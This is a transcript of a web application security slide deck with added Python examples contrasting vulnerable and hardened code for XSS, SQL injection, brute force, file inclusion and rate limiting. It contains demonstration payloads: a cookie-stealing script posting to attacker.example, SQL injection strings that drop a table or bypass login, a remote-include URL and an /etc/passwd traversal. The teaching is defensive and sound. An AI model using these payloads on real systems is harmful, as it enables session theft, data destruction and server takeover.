Web Application Security

Upload: akhil-raj

Posted on 08-Aug-2015


TRANSCRIPT

Page 1: Web application security

Web Application Security

Page 2: Web application security

Components & Architecture


Page 3: Web application security

Security Threats

• Cross-site scripting
• SQL injection
• Denial-of-service attack
• Brute force attack
• Remote file inclusion
• Man-in-the-middle attack
• Other server-side threats

Page 5: Web application security

Cross-site scripting(XSS)

• Allows attackers to inject their own malicious scripts into web pages and have them executed by the user's browser, in the origin of the vulnerable site

• Vulnerability commonly seen in:
– Search results that display back the text that was entered
– Error messages that display the text that caused the error
– Forms which are filled out whose values are later displayed to the user
– Web message boards where users can post messages

Page 8: Web application security

Defense tactics

• Write an HTMLEncode routine and pass every untrusted value through it at the moment it is written into the page (element content or a quoted attribute value); encode at output time, for the context the value lands in, rather than before storing it
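As an added example (not code from the slides), a Python HTMLEncode routine of the kind the slide asks for, applied to the reflection points listed earlier: a search page that echoes the query and a form that refills a value into an attribute. The function names, the page templates and the two payload strings are constructed for this illustration; the standard library's `html.escape(text, quote=True)` produces the same output.

```python
def html_encode(text: str) -> str:
    """HTMLEncode: replace the five characters that can change HTML structure
    when untrusted text is written into element content or a quoted attribute.
    Same result as html.escape(text, quote=True) from the standard library."""
    table = {"&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;"}
    return "".join(table.get(ch, ch) for ch in text)


def search_results_unsafe(query: str) -> str:
    """The vulnerable pattern from the slide: the search term is echoed verbatim."""
    return f"<p>No results for <b>{query}</b></p>"


def search_results_safe(query: str) -> str:
    """Same page, with the untrusted value encoded for element content."""
    return f"<p>No results for <b>{html_encode(query)}</b></p>"


def refill_form_safe(username: str) -> str:
    """Attribute context: quote the attribute AND encode the value. Encoding
    alone would not help if the attribute were left unquoted, because a space
    would then end the value."""
    return f'<input type="text" name="user" value="{html_encode(username)}">'


# Constructed payloads: a cookie-stealing script for element context and an
# attribute breakout that adds an event handler.
SCRIPT_PAYLOAD = ("<script>new Image().src='http://attacker.example/?c='"
                  "+document.cookie</script>")
ATTR_PAYLOAD = '" onfocus="alert(1)" autofocus="'


if __name__ == "__main__":
    print(search_results_unsafe(SCRIPT_PAYLOAD))   # the browser runs the script
    print(search_results_safe(SCRIPT_PAYLOAD))     # the browser shows it as text
    print(refill_form_safe(ATTR_PAYLOAD))          # stays inside the value="" quotes
```

This routine is only correct for element content and quoted attribute values. A value placed inside a `<script>` block, a URL, or a CSS property needs that context's own encoding, which is why the slide's advice is to encode where the value is written, not where it is stored.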

Page 9: Web application security

SQL Injection

• The process of an attacker adding his own SQL statements to user input so that they become part of the query the application runs

• Used by attackers to:
– Gain confidential information (credit card numbers, account details etc.)
– Bypass authorization
– Perform unauthorized updates

• Injection occurs through:
– Input fields (e.g. UserID and Password entry)
– Query string (values added to the website's URL)
– Manipulated values in HTML (hidden fields, cookies, headers)

Page 10: Web application security


UserID: Test
Password: 123

Select * from Users where UserID = 'Test' and Password = '123';

Web Applications take user input and build an SQL statement which they send to the database

Drop example

Page 11: Web application security


UserID: Test'; drop table users; --
Password: 123

Select * from Users where UserID = 'Test'; drop table users; -- and Password = '123';

(The input must contain the closing single quote, as the resulting statement shows: it ends the string literal, the semicolon starts a second statement, and -- comments out the rest of the original query.)

Web Applications take user input and build an SQL statement which they send to the database

Page 12: Web application security

SQL Injection Defense

• It is quite simple: input validation

• Check all input

• Web applications should not directly build SQL statements based on user input: use parameterized queries (prepared statements) so that the SQL text is fixed and user values are passed separately to the database; validation is a second layer, not a replacement
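An added example (not from the slides) that runs the two slides' queries against an in-memory SQLite database: the vulnerable login builds the statement by string concatenation exactly as the slide shows, the hardened one passes the same inputs as parameters. The table contents, the function names and the two payloads are constructed. One assumption is flagged in the code: Python's sqlite3 `execute()` refuses stacked statements, so `executescript()` stands in for a database driver that accepts them, which is what the slide's drop table payload needs.

```python
import sqlite3


def setup_db() -> sqlite3.Connection:
    """Constructed sample database: a Users table with two accounts."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (UserID TEXT, Password TEXT)")
    conn.executemany("INSERT INTO Users VALUES (?, ?)",
                     [("Test", "123"), ("admin", "s3cr3t")])
    conn.commit()
    return conn


def build_query_unsafe(user_id: str, password: str) -> str:
    """The pattern from the slides: user input pasted straight into the SQL text."""
    return (f"Select * from Users where UserID = '{user_id}' "
            f"and Password = '{password}';")


def login_unsafe(conn: sqlite3.Connection, user_id: str, password: str) -> set:
    """Vulnerable login: whatever the string says is what the database does.
    Returns the set of matched UserIDs."""
    sql = build_query_unsafe(user_id, password)
    try:
        return {row[0] for row in conn.execute(sql)}
    except (sqlite3.Warning, sqlite3.ProgrammingError):
        # sqlite3.execute() refuses stacked statements ("You can only execute
        # one statement at a time"). executescript() stands in here for a
        # driver that accepts them, which the slide's drop table payload needs.
        conn.executescript(sql)
        return set()


def login_safe(conn: sqlite3.Connection, user_id: str, password: str) -> set:
    """Hardened login: the SQL text is fixed and the values travel as
    parameters, so a quote or semicolon in the input is just data."""
    sql = "SELECT UserID FROM Users WHERE UserID = ? AND Password = ?"
    return {row[0] for row in conn.execute(sql, (user_id, password))}


def table_exists(conn: sqlite3.Connection, name: str) -> bool:
    row = conn.execute("SELECT 1 FROM sqlite_master WHERE type = 'table' AND name = ?",
                       (name,)).fetchone()
    return row is not None


DROP_PAYLOAD = "Test'; drop table users; --"   # the slide's payload, closing quote included
BYPASS_PAYLOAD = "' OR '1'='1' --"             # classic authorization bypass


if __name__ == "__main__":
    conn = setup_db()
    print(build_query_unsafe(DROP_PAYLOAD, "123"))
    print("unsafe login, bypass payload:", login_unsafe(conn, BYPASS_PAYLOAD, "x"))
    login_unsafe(conn, DROP_PAYLOAD, "123")
    print("Users table survives unsafe login:", table_exists(conn, "Users"))

    conn = setup_db()
    print("safe login, bypass payload:", login_safe(conn, BYPASS_PAYLOAD, "x"))
    login_safe(conn, DROP_PAYLOAD, "123")
    print("Users table survives safe login:", table_exists(conn, "Users"))
```

The bypass payload matters as much as the drop: it needs no stacked statements, works on every driver, and logs the attacker in as the first row of the table. Both payloads are harmless against `login_safe`, which is why parameterization, not filtering of quotes and semicolons, is the primary defense.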

Page 13: Web application security

Brute Force Attack

• A brute force attack is a trial-and-error method used to obtain information such as a user password or personal identification number (PIN).

• In a brute force attack, automated software is used to generate a large number of consecutive guesses as to the value of the desired data. Brute force attacks may be used by criminals to crack encrypted data, or by security analysts to test an organization's network security.

A brute force attack may also be referred to as brute force cracking.

Page 14: Web application security

Preventing Brute Force Attack

• Implement an account lockout policy

• Use a challenge-response test to prevent automated submissions of the login page, for example the free reCAPTCHA

• The web application should enforce the use of strong passwords
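An added example (not from the slides) of the first measure, an account lockout policy, wrapped around a login check. The `LoginGuard` class, the `attempt_login` function and the one-entry credential store are constructed for this illustration; the clock is injectable so the lock expiry can be exercised without waiting.

```python
import hmac
import time
from collections import defaultdict


class LoginGuard:
    """Account lockout policy: after `max_failures` failed logins within
    `lockout_seconds`, further attempts on that account are refused until the
    window has passed. Old failures fall out of the window automatically."""

    def __init__(self, max_failures=5, lockout_seconds=900, clock=time.monotonic):
        self.max_failures = max_failures
        self.lockout_seconds = lockout_seconds
        self._clock = clock
        self._failures = defaultdict(list)   # account -> timestamps of recent failures
        self._locked_until = {}              # account -> time the lock expires

    def is_locked(self, account: str) -> bool:
        until = self._locked_until.get(account)
        if until is None:
            return False
        if self._clock() >= until:           # lock expired: start with a clean slate
            del self._locked_until[account]
            self._failures.pop(account, None)
            return False
        return True

    def record_failure(self, account: str) -> bool:
        """Register a failed attempt; returns True if this one triggered a lock."""
        now = self._clock()
        recent = self._failures[account]
        recent[:] = [t for t in recent if now - t < self.lockout_seconds]
        recent.append(now)
        if len(recent) >= self.max_failures:
            self._locked_until[account] = now + self.lockout_seconds
            return True
        return False

    def record_success(self, account: str) -> None:
        self._failures.pop(account, None)
        self._locked_until.pop(account, None)


# Constructed credential store for the demo; a real one holds salted password hashes.
USERS = {"Test": "123"}


def attempt_login(guard: LoginGuard, account: str, password: str) -> str:
    """Returns 'locked', 'denied' or 'ok'. The lock is checked before the
    password, so a locked account reveals nothing about the guess."""
    if guard.is_locked(account):
        return "locked"
    stored = USERS.get(account, "")
    # Constant-time comparison: timing must not reveal how many characters matched.
    if stored and hmac.compare_digest(stored.encode(), password.encode()):
        guard.record_success(account)
        return "ok"
    guard.record_failure(account)
    return "denied"


if __name__ == "__main__":
    guard = LoginGuard(max_failures=3, lockout_seconds=60)
    for guess in ("123456", "password", "letmein", "123"):
        print(guess, "->", attempt_login(guard, "Test", guess))
```

The fourth guess is the right password and is still refused, which is the point of the policy. The caveat a practitioner wants: a lockout is itself a denial-of-service lever (anyone can lock an account they know the name of by guessing wrong on purpose), so keep locks temporary and pair them with per-source throttling and the challenge-response test from the slide rather than relying on lockout alone.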

Page 15: Web application security

DoS and DDoS

• An attempt to make a machine or network resource unavailable to its intended users.

• One common method of attack involves saturating the target machine with external communication requests.

• Such attacks usually lead to server overload.

Page 17: Web application security

Effects of DDoS

• Consumption of computational resources, such as bandwidth, memory, disk space, or processor time.

• Disruption of configuration information, such as routing information.

• Disruption of state information, such as unsolicited resetting of TCP sessions.

• Disruption of physical network components.

• Obstructing the communication media between the intended users and the victim so that they can no longer communicate adequately.

Page 18: Web application security

DDoS Prevention

• An effective defense against an HTTP flood can be the deployment of a reverse proxy that absorbs and rate-limits requests before they reach the application

• Increase the capacity of the system

• Load-balancing tools can distribute requests among many servers scattered across a wide geographical area

Page 19: Web application security

Remote file inclusion

• Allows an attacker to make the web server include and execute a file of the attacker's choosing, usually a remote file pulled in by a script on the web server.

• The vulnerability occurs when a script builds the name of the file to include from user-supplied input without proper validation.

Page 20: Web application security

This can lead to

• Code execution on the web server

• Code execution on the client side, such as JavaScript, which can lead to other attacks such as cross-site scripting (XSS)

• Denial of service (DoS)

• Data theft/manipulation

Page 21: Web application security

Prevention

• This type of attack can be defended against at the .htaccess level and by filtering the inputs: never pass user input straight to an include, map it through an allowlist of known pages instead.

• Make sure you keep PHP's register_globals off (and allow_url_include off, so include() cannot fetch remote URLs at all). This is a biggie that will prevent much evil!

• Hardening the server
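An added example (not from the slides) of the "filter the inputs" step. The slides describe the bug in terms of a script that includes whatever a request parameter names; this Python model shows the vulnerable resolution of a `?page=` parameter beside the hardened one, which maps the parameter through an allowlist and then checks that the result still lies inside the template directory. The directory name, the allowlist and the payloads are constructed; nothing is read from disk or fetched from the network.

```python
import posixpath
from urllib.parse import urlparse

TEMPLATE_DIR = "/var/www/app/pages"            # assumed deployment layout
ALLOWED_PAGES = {                               # constructed allowlist
    "home": "home.html",
    "about": "about.html",
    "contact": "contact.html",
}


def resolve_include_unsafe(page: str) -> str:
    """The vulnerable pattern: whatever came in ?page= is what gets included.
    A URL pulls attacker-hosted code onto the server (remote file inclusion);
    a relative path reads files the application never meant to serve."""
    if urlparse(page).scheme in ("http", "https", "ftp"):
        return page
    return posixpath.join(TEMPLATE_DIR, page)


def resolve_include_safe(page: str) -> str:
    """Hardened: the parameter is only ever a key into the allowlist, never a
    path, and the final location is verified to stay inside TEMPLATE_DIR."""
    filename = ALLOWED_PAGES.get(page)
    if filename is None:
        raise ValueError(f"unknown page: {page!r}")
    target = posixpath.normpath(posixpath.join(TEMPLATE_DIR, filename))
    if posixpath.commonpath([TEMPLATE_DIR, target]) != TEMPLATE_DIR:
        raise ValueError("include escapes the template directory")
    return target


# Constructed attack inputs: a remote file and a directory traversal.
RFI_PAYLOAD = "http://attacker.example/shell.txt"
LFI_PAYLOAD = "../../../etc/passwd"


if __name__ == "__main__":
    for value in ("home", RFI_PAYLOAD, LFI_PAYLOAD):
        print("unsafe:", value, "->", resolve_include_unsafe(value))
        try:
            print("safe:  ", value, "->", resolve_include_safe(value))
        except ValueError as err:
            print("safe:  ", value, "-> rejected:", err)
```

The containment check after the allowlist looks redundant, and with a fixed dictionary it is; it is there so that the function stays safe if someone later replaces the dictionary with a lookup that can return user-influenced names.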

Page 22: Web application security

Man in Middle Attack

• A man-in-the-middle attack is a type of cyberattack where a malicious actor inserts themselves into a conversation between two parties, relaying and possibly altering the traffic while each side believes it is talking directly to the other.

• A MITM attack exploits the real-time processing of transactions, conversations or transfer of other data.

Page 24: Web application security

Prevention

• Use strong encryption between the client and the server: TLS (HTTPS) with certificate validation, on every page, not only the login page

• On the client side you can use a browser plug-in such as HTTPS Everywhere or ForceTLS to insist on the encrypted version of a site.

Page 25: Web application security

Server Hardening

• Shut down unused Services

• Hide services with port knocking. Example:
– The web server service is public
– Hide the SFTP and SSH services behind a knock sequence

• Use one-time passwords (OTP) generated by a password generator for administrative logins


Page 26: Web application security

Restrict resources to avoid DoS attacks

• Change the default timeout

• Restrict HTTP requests (per-client rate and connection limits)

Restrict access to web resources

• Often resources are not meant to be accessible to everyone

• htaccess is a simple mechanism for access protection

• htaccess is activated by placing a .htaccess file in the protected directory (or in a directory above it)
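An added example (not from the slides) of the "restrict HTTP requests" item above and of what the reverse proxy on the DDoS prevention slide does with an HTTP flood: a per-client token-bucket limiter. The class, the request handler and the simulated request log are constructed for this illustration; the clock is injectable so refill can be exercised without sleeping. The limiter caps the number of clients it remembers, because a limiter whose memory grows with every new source address would itself be a DoS target.

```python
import time
from collections import OrderedDict


class TokenBucketLimiter:
    """Per-client token bucket: a client may burst up to `burst` requests and
    then sustain `rate` requests per second. Clients live in an LRU map capped
    at `max_clients`, so a flood from many distinct or spoofed addresses cannot
    exhaust the limiter's own memory."""

    def __init__(self, rate=10.0, burst=20, max_clients=100_000, clock=time.monotonic):
        self.rate = rate
        self.burst = burst
        self.max_clients = max_clients
        self._clock = clock
        self._buckets = OrderedDict()        # client -> [tokens, last_refill_time]

    def allow(self, client: str) -> bool:
        now = self._clock()
        bucket = self._buckets.get(client)
        if bucket is None:
            if len(self._buckets) >= self.max_clients:
                self._buckets.popitem(last=False)     # evict least recently seen
            bucket = [float(self.burst), now]
            self._buckets[client] = bucket
        else:
            self._buckets.move_to_end(client)
            tokens, last = bucket
            bucket[0] = min(self.burst, tokens + (now - last) * self.rate)
            bucket[1] = now
        if bucket[0] >= 1.0:
            bucket[0] -= 1.0
            return True
        return False

    def tracked_clients(self) -> list:
        return list(self._buckets)


def handle(limiter: TokenBucketLimiter, client: str, path: str) -> tuple:
    """What the proxy does per request: drop early with 429, or pass it on."""
    if not limiter.allow(client):
        return 429, "Too Many Requests"
    return 200, f"served {path}"


# Constructed request log: one flooding client and one normal visitor.
REQUESTS = [("10.0.0.7", "/")] * 30 + [("192.0.2.1", "/about")] + [("10.0.0.7", "/")] * 5


if __name__ == "__main__":
    limiter = TokenBucketLimiter(rate=5.0, burst=20)
    outcomes = {}
    for client, path in REQUESTS:
        status, _ = handle(limiter, client, path)
        outcomes.setdefault(client, []).append(status)
    for client, statuses in outcomes.items():
        print(client, "served:", statuses.count(200), "rejected:", statuses.count(429))
```

The normal visitor is unaffected by the flood because limits are per client; the trade-off is that clients behind one NAT share a bucket, so the burst and rate need to be set from real traffic, not guessed.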


Source: http://www.howtomonster.com/2007/08/12/how-to-restrict-access-to-a-web-site-folder/

Page 27: Web application security

Hide our information (server and framework version banners)

Page 28: Web application security

Linux Systems Monitoring Cycle


Page 29: Web application security

OWASP

• The Open Web Application Security Project (OWASP) is an online community dedicated to web application security. The OWASP community includes corporations, educational organizations, and individuals from around the world.

• https://www.owasp.org/
